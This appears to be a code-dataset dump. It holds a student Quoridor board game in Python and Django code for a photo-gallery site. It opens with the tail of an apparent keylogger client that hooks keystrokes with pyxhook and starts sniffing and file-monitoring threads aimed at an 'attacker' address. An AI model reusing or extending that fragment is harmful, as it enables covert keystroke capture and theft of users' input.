fileMonitor = Monitor(addr=attacker)
#event listner for keyboard press down
new_hook=pyxhook.HookManager()
new_hook.KeyDown=OnKeyPress
new_hook.HookKeyboard()
# Daemonize everything so the process dies with the main thread.
new_hook.daemon = True
fileMonitor.daemon = True
sniffThread.daemon = True
new_hook.start()
sniffThread.start()
fileMonitor.start()
# Idle main loop; Ctrl-C exits cleanly.
while True:
    try:
        time.sleep(5)
    except KeyboardInterrupt:
        #reset()
        print ("Exiting")
        sys.exit(0)
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,166 | samuelgougeon/python_projet2 | refs/heads/master | /vrmtest.py | '''Vrm pour faire des tests'''
import quoridor
def _lire_position(prompt):
    """Ask the user for a position and parse "(x, y)"-style input.

    Only the characters at indexes 1 and 4 are read, matching the original
    parsing of inputs shaped like "(4, 5)".
    """
    saisie = input(prompt)
    return (int(saisie[1]), int(saisie[4]))


def jouer_jeu(joueur1, robot):
    """Run an interactive test match between a human and the bot.

    Arguments:
        joueur1 -- name of the human player (player 1)
        robot -- name of the automated opponent (player 2)
    """
    partie = quoridor.Quoridor((f'{joueur1}', f'{robot}'))
    # Bug fix: partie.__str__() was called and its return value discarded,
    # so the board was never displayed; print it instead.
    print(partie)
    while True:
        type_coup = input('Quel est ton type de coup?')
        if type_coup == 'D':
            pos = _lire_position('Vers quelle position veux-tu aller?')
            partie.déplacer_jeton(1, pos)
        elif type_coup == 'MH':
            pos = _lire_position('À quelle position veux-tu placer un mur horizontal?')
            partie.placer_mur(1, pos, 'horizontal')
        elif type_coup == 'MV':
            pos = _lire_position('À quelle position veux-tu placer un mur vertical?')
            partie.placer_mur(1, pos, 'vertical')
        else:
            # Unknown move type: just redisplay the board and ask again.
            print(partie)
            continue
        # The bot (player 2) answers, then the state is reported.
        partie.jouer_coup(2)
        print(f'La partie est terminée: {partie.partie_terminée()}')
        print(partie)
# Launch an interactive test match between a human and the bot.
jouer_jeu('Samu-kun', 'Baka-kun')
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,167 | samuelgougeon/python_projet2 | refs/heads/master | /api.py | '''S'occupe des requêtes au serveur'''
import requests
URL_BASE = 'https://python.gel.ulaval.ca/quoridor/api/'
#fonction 4
def débuter_partie(idul):
    """Ask the server to start a new game for the given player.

    Arguments:
        idul -- identifier of the player

    Returns:
        tuple -- (game id, game-state dictionary)

    Raises:
        RuntimeError -- the server rejected the request (carries its message)
        ConnectionError -- the HTTP status code was not 200
    """
    rep = requests.post(URL_BASE+'débuter/', data={'idul': idul})
    # Fix: decode the body only on success. On an HTTP error the body may
    # not be JSON, and .json() would raise before ConnectionError could be
    # reported with the status code.
    if rep.status_code == 200:
        rep2 = rep.json()
        if 'message' in rep2:
            raise RuntimeError(rep2['message'])
        return rep2['id'], rep2['état']
    raise ConnectionError(rep.status_code)
#fonction 5
def jouer_coup(id_partie, type_coup, position):
    """Send a move to the server and return the updated game state.

    Arguments:
        id_partie -- id of the current game
        type_coup -- type of the move, as expected by the server
        position -- target position of the move

    Returns:
        dict -- the new game-state dictionary

    Raises:
        StopIteration -- the game is over; carries the winner's name
        RuntimeError -- the server rejected the move (carries its message)
        ConnectionError -- the HTTP status code was not 200
    """
    rep = requests.post(
        URL_BASE+'jouer/',
        data={'id': id_partie, 'type': type_coup, 'pos': position}
    )
    # Fix: decode the body only on success — an HTTP error body may not be
    # JSON, and .json() would raise before ConnectionError could be raised.
    if rep.status_code == 200:
        rep2 = rep.json()
        if 'gagnant' in rep2:
            raise StopIteration(rep2['gagnant'])
        if 'message' in rep2:
            raise RuntimeError(rep2['message'])
        return rep2['état']
    raise ConnectionError(rep.status_code)
78,168 | samuelgougeon/python_projet2 | refs/heads/master | /quoridor.py | '''Encadrer le jeu avec une classe'''
from random import random
import networkx as nx
def construire_graphe(joueurs, murs_horizontaux, murs_verticaux):
    """
    Build the graph of admissible moves for both players.

    :param joueurs: a list of the (x,y) positions of the players.
    :param murs_horizontaux: a list of the (x,y) positions of horizontal walls.
    :param murs_verticaux: a list of the (x,y) positions of vertical walls.
    :returns: the bidirectional (networkX) graph of admissible moves.
    """
    joueurs = list(map(tuple, joueurs))
    graphe = nx.DiGraph()
    # for every column of the board
    for x in range(1, 10):
        # for every row of the board
        for y in range(1, 10):
            # add the edges of every move possible from this tile
            if x > 1:
                graphe.add_edge((x, y), (x-1, y))
            if x < 9:
                graphe.add_edge((x, y), (x+1, y))
            if y > 1:
                graphe.add_edge((x, y), (x, y-1))
            if y < 9:
                graphe.add_edge((x, y), (x, y+1))
    # remove every edge crossing a horizontal wall
    for x, y in murs_horizontaux:
        graphe.remove_edge((x, y-1), (x, y))
        graphe.remove_edge((x, y), (x, y-1))
        graphe.remove_edge((x+1, y-1), (x+1, y))
        graphe.remove_edge((x+1, y), (x+1, y-1))
    # remove every edge crossing a vertical wall
    for x, y in murs_verticaux:
        graphe.remove_edge((x-1, y), (x, y))
        graphe.remove_edge((x, y), (x-1, y))
        graphe.remove_edge((x-1, y+1), (x, y+1))
        graphe.remove_edge((x, y+1), (x-1, y+1))
    # remove every edge pointing to a player's position and add the
    # straight-line or diagonal jumps, as appropriate
    prédécesseurs = list(list(graphe.predecessors(joueur)) for joueur in map(tuple, joueurs))
    successors = list(list(graphe.successors(joueur)) for joueur in map(tuple, joueurs))
    for i, joueur in enumerate(joueurs):
        for prédécesseur in prédécesseurs[i]:
            # remove every edge leading to a player's position
            graphe.remove_edge(prédécesseur, joueur)
            # if admissible, add a jump-over edge
            # (the `i` inside each generator below is scoped to that
            # generator and does not clobber the enumerate index)
            successeur_en_ligne = tuple(
                2*joueur[i]-prédécesseur[i] for i in range(len(joueur))
            )
            if successeur_en_ligne in set(successors[i])-set(joueurs):
                # add a straight-line jump
                graphe.add_edge(prédécesseur, successeur_en_ligne)
            else:
                # add the diagonal edges
                successeur_diag_1 = tuple(
                    joueur[i]+(joueur[-(i+1)]-prédécesseur[-(i+1)])
                    for i in range(len(joueur))
                )
                if successeur_diag_1 in set(successors[i])-set(joueurs):
                    graphe.add_edge(prédécesseur, successeur_diag_1)
                successeur_diag_2 = tuple(
                    joueur[i]-(joueur[-(i+1)]-prédécesseur[-(i+1)])
                    for i in range(len(joueur))
                )
                if successeur_diag_2 in set(successors[i])-set(joueurs):
                    graphe.add_edge(prédécesseur, successeur_diag_2)
    # add the objective nodes of both players
    for x in range(1, 10):
        graphe.add_edge((x, 9), 'B1')
        graphe.add_edge((x, 1), 'B2')
    return graphe
class QuoridorError(Exception):
    '''Domain-specific exception for the Quoridor game: all of Exception's
    behaviour, available under the name 'QuoridorError'.'''
class Quoridor:
'''Pour encadrer le jeu'''
def __init__(self, joueurs, murs=None):
#Erreurs de base à soulever
if not hasattr(joueurs, '__iter__'):
raise QuoridorError("Ton argument 'joueurs' n'est pas un itérable.")
if len(joueurs) > 2:
raise QuoridorError("On ne veut jouer qu'à deux joueurs.")
#Si 'joueurs' est un itérable de strings, créer la liste de dictionnaires
if isinstance(joueurs[0], str) and isinstance(joueurs[1], str):
self.joueurs = [
{'nom': joueurs[0], 'murs': 10, 'pos': (5, 1)},
{'nom': joueurs[1], 'murs': 10, 'pos': (5, 9)},
]
#Si 'joueurs' est un itérable de dictionnaires, les traiter
if isinstance(joueurs[0], dict) and isinstance(joueurs[1], dict):
for i in joueurs:
if not 0 <= joueurs[i]['murs'] <= 10:
raise QuoridorError("Le nombre de murs à placer est entre 0 et 10.")
if not 1 <= joueurs[i]['pos'][0] <= 9 or not 1 <= joueurs[i]['pos'][1] <= 9:
raise QuoridorError("La position que tu essaies d'entrer n'est pas valide!")
self.joueurs = joueurs
#Si les murs n'existent pas encore, créer le dictionnaire
if murs is None:
self.murs = {'horizontaux': [], 'verticaux': []}
#Si les murs existent, les traiter
else:
if not isinstance(murs, dict):
raise QuoridorError("Ton argument 'murs' n'est pas un dictionnaire.")
for i in enumerate(murs['horizontaux']):
if not 1 <= i[1][0] <= 8 or not 2 <= i[1][1] <= 9:
raise QuoridorError("Position de mur invalide")
for i in enumerate(murs['verticaux']):
if not 2 <= i[1][0] <= 9 or not 1 <= i[1][1] <= 8:
raise QuoridorError("Position de mur invalide")
self.murs = murs
#Nombre maximal de murs en circulation
if self.joueurs[0]['murs'] + self.joueurs[1]['murs'] + len(self.murs['horizontaux']) + len(self.murs['verticaux']) != 20:
raise QuoridorError("Nombre total de murs invalide (seul nombre autorisé: 20).")
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
    def __str__(self):
        '''Render the board as ASCII art (legend, grid, walls, pawns).'''
        # NOTE(review): the legend formats the full player dicts, not just
        # the names — confirm that is the intended display.
        le = 'Légende: 1={}, 2={}'.format(self.joueurs[0], self.joueurs[1])
        # gb is a list of rows of single-character cells; board rows (f1)
        # alternate with wall rows (hb).
        gb = []
        for i in range(9):
            f1 = [' ', ' ', '.', ' ']*9 + ['|']
            f1[0] = f'\n{i+1} |'
            gb += [f1]
            hb = [' ']*36 + ['|']
            hb[0] = '\n |'
            gb += [hb]
        ve = self.murs['verticaux']
        ho = self.murs['horizontaux']
        pos1 = self.joueurs[0]['pos']
        pos2 = self.joueurs[1]['pos']
        # Paint vertical walls (3 cells tall) into the grid.
        for i in range(len(ve)):
            for j in range(3):
                gb[ve[i][1]*2 - 2+j][ve[i][0]*4 -4] = '|'
        # Paint horizontal walls (7 cells wide) into the grid.
        for i in range(len(ho)):
            for j in range(7):
                gb[ho[i][1]*2 - 3][ho[i][0]*4 - 3 + j] = '-'
        # Place the two pawns.
        gb[pos1[1]*2 - 2][pos1[0]*4 - 2] = '1'
        gb[pos2[1]*2 - 2][pos2[0]*4 - 2] = '2'
        # Rows are built bottom-up, so reverse before flattening.
        s = []
        gb.reverse()
        for i in range(17):
            s += ''.join(gb[i+1])
        ch = (le + '\n '+'-'*35 + ''.join(s) +
              '\n--|'+'-'*35+'\n | 1 2 3 4 5 6 7 8 9')
        return ch
def déplacer_jeton(self, joueur, position):
'''Pour déplacer un jeton à une position'''
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
#Contraintes et déplacement du jeton
if not joueur in {1, 2}:
raise QuoridorError("Le numéro du joueur doit être 1 ou 2.")
if not (1 <= position[0] <= 9 and 1 <= position[1] <= 9):
raise QuoridorError("Cette position n'existe pas!")
if position not in list(self.graphe.successors(self.joueurs[joueur - 1]['pos'])):
raise QuoridorError("Tu ne peux pas aller là!")
self.joueurs[joueur - 1]['pos'] = position
def état_partie(self):
'''Pour produire le dictionnaire d'état de jeu'''
return {'joueurs': self.joueurs, 'murs': self.murs}
def jouer_coup(self, joueur):
"""Pour jouer le meilleur coup automatique"""
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
if not joueur in {1, 2}:
raise QuoridorError("Le numéro du joueur doit être 1 ou 2.")
if self.partie_terminée() is not False:
raise QuoridorError("La partie est déjà terminée.")
def placer_mur_devant(joueur, a):
"""fonction pour placer un mur devant le joueur adversaire"""
if a[2][0]-a[1][0] == 0:
#Pour savoir si le chemin le plus court est vertical
em = [a[2][0]]
if a[2][0] == 9:
#pour ne pas que le mur sort du damier
em = [8]
if a[2][1]-a[1][1] == -1:
#pour mettre le mur en bas du joueur lorsqu'il doit déscendre
em.insert(1, a[2][1]+1)
else:
#Pour mettre le mur en haut du joueur lorsqu'il doit monter
em.insert(1, a[2][1])
ori = 'horizontal'
if a[2][1]-a[1][1] == 0:
#Pour savoir si le chemin le plus court est horizontal
em = [a[2][1]]
if a[2][1] == 9:
#Pour ne pas que le mur sorte du damier
em = [8]
if a[2][0]-a[1][0] == -1:
#Pour mettre le mur à gauche lorsque le chemin le plus court est à gauche
em.insert(0, a[2][0]+1)
else:
#Pour mettre le mur à droite lorsque le chemin le plus court est à droite
em.insert(0, a[2][0])
ori = 'vertical'
Quoridor.placer_mur(self, joueur, em, ori)
possibilité = [1, 2]
possibilité.remove(joueur)
adversaire = possibilité[0]
#L'adversaire prend le numero restant entre 1 et 2
chemin = nx.shortest_path(self.graphe, self.joueurs[joueur - 1]['pos'], f'B{joueur}')[0]
chemin_adversaire = nx.shortest_path(self.graphe, self.joueurs[adversaire - 1]['pos'], f'B{adversaire}')[0]
if len(chemin) <= len(chemin_adversaire):
if random() <= 0.1*self.joueurs[joueur - 1]['mur']-0.1:
#fonction qui place des murs aléatoirement mais proportionnelement au nombres de murs restants
#il restera cepedant toujours un mur pour le garder en cas où l'adversaire allait gagner
placer_mur_devant(joueur, chemin_adversaire)
else:
#Avancer le jeton vers son but
Quoridor.déplacer_jeton(self, joueur, chemin[1])
if len(chemin_adversaire) == 2:
#toujours placer un mur devant l'adversaire lorsqu'il est à un déplacement de gagner
placer_mur_devant(joueur, chemin_adversaire)
else:
#Si le chemin de l'adversaire est plus court que le nôtre, on place un mur devant celui-ci
placer_mur_devant(joueur, chemin_adversaire)
def partie_terminée(self):
'''Pour arrêter la partie si elle est terminée'''
if self.joueurs[0]['pos'][1] == 9:
return 'Le gagnant est {}'.format(self.joueurs[0]['nom'])
elif self.joueurs[1]['pos'][1] == 1:
return 'Le gagnant est {}'.format(self.joueurs[1]['nom'])
else:
return False
def placer_mur(self, joueur, position, orientation):
'''Pour placer un mur à une position'''
#Les possibilités de mouvement d'un joueur selon l'état du jeu
self.graphe = construire_graphe(
[joueur['pos'] for joueur in self.joueurs],
self.murs['horizontaux'],
self.murs['verticaux']
)
#S'assurer que le numéro de joueur est 1 ou 2 et traiter le nombre de murs en banque.
if joueur in {1, 2}:
if self.joueurs[joueur - 1]['murs'] != 0:
self.joueurs[joueur - 1]['murs'] -= 1
else:
raise QuoridorError("Tu as déjà placé tous tes murs :'(")
else:
raise QuoridorError("Le numéro du joueur doit être 1 ou 2.")
#Placement d'un mur horizontal
if orientation == 'horizontal':
#S'assurer que le mur peut être placé d'après les dimensions du board
if not 1 <= position[0] <= 8 or not 2 <= position[1] <= 9:
raise QuoridorError('Tu ne peux pas placer un mur à cet endroit')
#S'assurer que ce nouveau mur horizontal ne croise pas un autre mur
if (position[0] + 1, position[1] - 1) in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
if (position[0] + 1, position[1]) in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
if position in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
if (position[0] - 1, position[1]) in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
self.murs['horizontaux'].append(position)
#S'assurer que les joueurs ne sont pas enfermés
if nx.has_path(self.graphe, self.joueurs[0]['pos'], 'B1') is False:
self.murs['horizontaux'].remove(position)
raise QuoridorError("Le joueur 1 est enfermé! Shame on you.")
elif nx.has_path(self.graphe, self.joueurs[1]['pos'], 'B2') is False:
self.murs['horizontaux'].remove(position)
raise QuoridorError("Le joueur 2 est enfermé! Shame on you.")
#Placement d'un mur vertical
elif orientation == 'vertical':
#S'assurer que le mur peut être placé d'après les dimensions du board
if not 2 <= position[0] <= 9 or not 1 <= position[1] <= 8:
raise QuoridorError('Tu ne peux pas placer un mur à cet endroit')
#S'assurer que ce nouveau mur vertical ne croise pas un autre mur
if (position[0] - 1, position[1] + 1) in self.murs['horizontaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
elif (position[0], position[1] - 1) in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
elif position in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
elif (position[0], position[1] + 1) in self.murs['verticaux']:
raise QuoridorError('Un mur déjà placé bloque cet endroit')
else:
self.murs['verticaux'].append(position)
#S'assurer que les joueurs ne sont pas enfermés
if nx.has_path(self.graphe, self.joueurs[0]['pos'], 'B1') is False:
self.murs['verticaux'].remove(position)
raise QuoridorError("Le joueur 1 est enfermé! Shame on you.")
elif nx.has_path(self.graphe, self.joueurs[1]['pos'], 'B2') is False:
self.murs['verticaux'].remove(position)
raise QuoridorError("Le joueur 2 est enfermé! Shame on you.")
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,169 | samuelgougeon/python_projet2 | refs/heads/master | /main.py | '''Pour exécuter le jeu'''
import argparse
#Fonction du jeu
def analyser_commande(argv=None):
    """Parse the command line for the Quoridor game.

    :param argv: optional list of argument strings; when None (the
        default, matching the previous behavior) the real command line
        ``sys.argv[1:]`` is parsed.
    :return: the parsed ``argparse.Namespace`` with ``idul``,
        ``automatique`` and ``graphique`` attributes.
    """
    parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')
    parser.add_argument('idul', help='IDUL du joueur')
    parser.add_argument('-a', '--automatique', help='Activer le mode automatique.', action='store_true')
    parser.add_argument('-x', '--graphique', help='Activer le mode graphique.', action='store_true')
    args = parser.parse_args(argv)
    return args


if __name__ == '__main__':
    # Guard the script entry point so importing this module has no side effect.
    analyser_commande()
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,170 | samuelgougeon/python_projet2 | refs/heads/master | /quoridorX.py | """Module pour afficher la fenêtre graphique"""
import turtle
import quoridor
class QuoridorX(quoridor.Quoridor):
    """Quoridor subclass that renders the game in a turtle graphics window."""
    def afficher(self):
        """Open a turtle window and draw the current board state.

        Draws the legend, the 9x9 grid of grey squares, every placed wall,
        and both pawns (player 1 blue, player 2 red). Blocks in
        ``mainloop`` until the window is closed.
        """
        wn = turtle.Screen()
        wn.setup(464, 564)
        # Legend line at the top of the window.
        le = turtle.Turtle()
        le.penup()
        le.goto(0, 254)
        le.write('Légende: bleu={}, rouge={}'.format(self.joueurs[0], self.joueurs[1]),
                 True, 'center', font=('Cambria', 14))
        # Stamp used for each grid square.
        damier = turtle.Turtle()
        damier.shape('square')
        damier.shapesize(2)
        damier.color('grey')
        damier.penup()
        damier.speed(0)
        # Stamp used for horizontal walls (wide, thin).
        ho = turtle.Turtle()
        ho.shape('square')
        ho.shapesize(0.3, 4.4)
        ho.color('black')
        ho.penup()
        ho.speed(0)
        # Stamp used for vertical walls (tall, thin).
        ve = turtle.Turtle()
        ve.shape('square')
        ve.shapesize(4.4, 0.3)
        ve.color('black')
        ve.penup()
        ve.speed(0)
        # Player pawns.
        j1 = turtle.Turtle()
        j1.shape('circle')
        j1.color('blue')
        j1.penup()
        j2 = turtle.Turtle()
        j2.shape('circle')
        j2.color('red')
        j2.penup()
        # Board coordinates are mapped to screen pixels with a 48 px pitch.
        for i in self.murs['horizontaux']:
            ho.goto(i[0]*48 - 216, i[1]*48 - 264)
            ho.stamp()
        for i in self.murs['verticaux']:
            ve.goto(i[0]*48 - 264, i[1]*48 - 216)
            ve.stamp()
        # Stamp the 9x9 grid of squares.
        for y in range(9):
            for x in range(9):
                screen_x = -192 + (x*48)
                screen_y = 192 - (y*48)
                damier.goto(screen_x, screen_y)
                damier.stamp()
        # Place both pawns on their current squares.
        j1.goto((self.joueurs[0]['pos'][0])*48 - 240, (self.joueurs[0]['pos'][1])*48 - 240)
        j2.goto((self.joueurs[1]['pos'][0])*48 - 240, (self.joueurs[1]['pos'][1])*48 - 240)
        wn.mainloop()
| {"/vrmtest.py": ["/quoridor.py"], "/quoridorX.py": ["/quoridor.py"]} |
78,174 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/management/commands/process_images.py | from django.core.management.base import BaseCommand, CommandError
from apps.galleries.models import Gallery
from optparse import make_option
class Command(BaseCommand):
    """Management command: (re)process gallery image metadata and thumbnails.

    With no flags every step runs for each image; each flag restricts the
    run to that single step.
    """
    option_list = BaseCommand.option_list + (
        make_option('--dimensions',
                    action='store_true',
                    dest='dimensions',
                    default=False,
                    help='Only update width, height, and is_portrait.'),
        make_option('--thumbnails',
                    action='store_true',
                    dest='thumbnails',
                    default=False,
                    help='Only generate thumbnails.'),
        make_option('--s3-object-names',
                    action='store_true',
                    dest='s3_object_names',
                    default=False,
                    help='Only update s3_object_name (from full_size_url).'),
    )
    args = '<gallery_id gallery_id ...>'
    help = 'Process gallery image meta data and/or thumbnails. If no options are passed, all options are processed.'

    def handle(self, *args, **options):
        """Process every gallery, or only the ids given as arguments."""
        # No ids given: process all galleries.
        if len(args) == 0:
            galleries = Gallery.objects.all()
        else:
            galleries = []
            for gallery_id in args:
                try:
                    galleries.append(Gallery.objects.get(pk=int(gallery_id)))
                except Gallery.DoesNotExist:
                    raise CommandError('Gallery %s does not exist' % gallery_id)
        current_gallery = 1
        total_galleries = len(galleries)
        for gallery in galleries:
            # Progress banner for this gallery.
            self.stdout.write('\n ----------------------------------------')
            self.stdout.write(' %s' % (gallery))
            self.stdout.write(' Gallery %s of %s' % (current_gallery, total_galleries))
            self.stdout.write(' ----------------------------------------')
            gallery_images = gallery.galleryimage_set.all()
            current_image = 1
            total_images = len(gallery_images)
            for gallery_image in gallery_images:
                self.stdout.write('\n %s' % (gallery_image.name))
                self.stdout.write(' Image %s of %s' % (current_image, total_images))
                # Running with no flags at all means "do everything".
                no_options_passed =\
                    not options['dimensions'] and\
                    not options['s3_object_names'] and\
                    not options['thumbnails']
                if options['dimensions'] or no_options_passed:
                    self.stdout.write(' - setting dimensions')
                    gallery_image.set_dimensions()
                if options['s3_object_names'] or no_options_passed:
                    self.stdout.write(' - setting s3_object_name')
                    gallery_image.set_s3_object_name()
                if options['thumbnails'] or no_options_passed:
                    self.stdout.write(' - making thumbnails')
                    gallery_image.generate_thumbnails()
                self.stdout.write(' - done!')
                current_image += 1
            current_gallery += 1
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,175 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/management/commands/freshdb.py | import os
from django.core.management.base import NoArgsCommand
from subprocess import call
class Command(NoArgsCommand):
    help = 'Drop the database and create a fresh one'

    def handle_noargs(self, **options):
        """Recreate the 'sbp' database from scratch and seed a superuser."""
        # Each step is (shell command, friendly progress message),
        # executed strictly in order.
        steps = (
            (['dropdb', '--if-exists', 'sbp'], 'dropping db'),
            (['createdb', 'sbp'], 'creating fresh db'),
            (['python', 'manage.py', 'syncdb', '--migrate', '--noinput'], 'syncing db'),
            (['python', 'manage.py', 'superuser'], 'making superuser'),
        )
        for command, message in steps:
            run(command, message)
        write('=============================================')
        write("\n It's on Donkey Kong!\n")
def run(command, friendly_output):
    # Echo a progress message, then execute *command* via subprocess.call.
    write('...' + friendly_output)
    call(command)


def write(string):
    # Write *string* plus a newline straight to stdout (no print buffering quirks).
    os.sys.stdout.write(string + '\n')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,176 | levithomason/sparrowbleu | refs/heads/master | /settings/__init__.py | # Choose the right settings, development is excluded from the repo so its only loaded locally
try:
    # development.py is excluded from the repo, so it only exists locally.
    from development import *
except ImportError:
    # No local development settings: fall back to production settings.
    from production import *
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,177 | levithomason/sparrowbleu | refs/heads/master | /fabfile.py | import sys
from fabric.api import local, hide
def test():
    # Run the Python unit tests (everything not tagged e2e).
    local('python manage.py test --attr=!e2e')


def test_e2e():
    # Run the end-to-end tests only, without capturing log output.
    local('python manage.py test --attr=e2e --nologcapture')


def test_pep8():
    # PEP 8 style check, skipping vendored and generated code.
    local('pep8 . --exclude=venv/,helper_files,migrations')


def push():
    # Push the current branch to GitHub.
    local('git push')


def push_heroku():
    # Deploy master to Heroku.
    local('git push heroku master')


def deploy():
    # Full deploy pipeline: all tests, style check, then push to GitHub
    # and Heroku. NOTE: this fabfile uses Python 2 print statements.
    print "%" * 80
    print " Deploying Sparrow Bleu, me lord!"
    print "%" * 80
    print ""
    with hide('running', 'output', 'stdout'):
        _fancy_output("Running python unit tests", test)
        _fancy_output("Running python E2E tests", test_e2e)
        _fancy_output("Testing PEP8", test_pep8)
        # run jasmine tests
        _fancy_output("Pushing to GitHub", push)
        _fancy_output("Pushing to Heroku", push_heroku)


def _fancy_output(message, func):
    # Print "<message>..." without a trailing newline, run func, then "done".
    sys.stdout.write("%s..." % message)
    func()
    print "done"
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,178 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/management/commands/superuser.py | from django.core.management.base import NoArgsCommand
from django.db import DEFAULT_DB_ALIAS as database
from django.contrib.auth.models import User
from django.conf import settings
class Command(NoArgsCommand):
    """Management command: create the Django superuser from settings values."""
    help = 'Create superuser from env variables'

    def handle_noargs(self, **options):
        # Credentials come from settings (SUPERUSER_NAME/EMAIL/PASSWORD),
        # which are populated from environment variables.
        User.objects.db_manager(database).create_superuser(settings.SUPERUSER_NAME, settings.SUPERUSER_EMAIL,
                                                           settings.SUPERUSER_PASSWORD)
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,179 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/views.py | from django.shortcuts import redirect
def home(request):
    # The site root just forwards visitors to the client passcode page.
    return redirect('/client-access')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,180 | levithomason/sparrowbleu | refs/heads/master | /apps/user/views.py | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import User
from apps.user.forms import loginForm
def user_login(request):
    """Log a user in.

    GET renders the login form. POST validates the form and authenticates;
    on success redirects to the galleries page, otherwise re-renders the
    form with a message saying whether the username or password was wrong.
    """
    if request.method == "POST":
        form = loginForm(request.POST)
        errors = []
        if form.is_valid():
            username = request.POST['username']
            password = request.POST['password']
            user = authenticate(username=username, password=password)
            # Distinguish "unknown user" from "wrong password" in the message.
            # NOTE(review): revealing whether a username exists enables user
            # enumeration — consider a single generic error message.
            try:
                User.objects.get(username=username)
            except User.DoesNotExist:
                errors.append('User "%s" does not exist.' % username)
                return render(request, 'user_login.html', {'form': form, 'errors': errors})
            # authenticate() returns None on failure, so the previous
            # "user and user is not None" double-check was redundant.
            if user is not None and user.is_active:
                login(request, user)
                return redirect('/galleries/')
            errors.append('Wrong password for "%s".' % username)
            return render(request, 'user_login.html', {'form': form, 'errors': errors})
        return render(request, 'user_login.html', {'form': form})
    form = loginForm()
    return render(request, 'user_login.html', {'form': form})
def user_logout(request):
    # End the session and send the visitor back to the site root.
    logout(request)
    return redirect('/')
| {"/apps/sparrow_bleu/management/commands/process_images.py": ["/apps/galleries/models.py"], "/apps/user/views.py": ["/apps/user/forms.py"], "/apps/galleries/views.py": ["/apps/galleries/models.py", "/apps/galleries/forms.py", "/apps/sparrow_bleu/utils.py"], "/apps/user/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/forms.py": ["/apps/galleries/models.py"], "/apps/galleries/tasks.py": ["/settings/__init__.py"]} |
78,181 | levithomason/sparrowbleu | refs/heads/master | /apps/sparrow_bleu/utils.py | import re
def _human_key(key):
'''
Sorts a list in natural sort fashion
http://stackoverflow.com/questions/5295087/how-to-sort-alphanumeric-list-of-django-model-objects
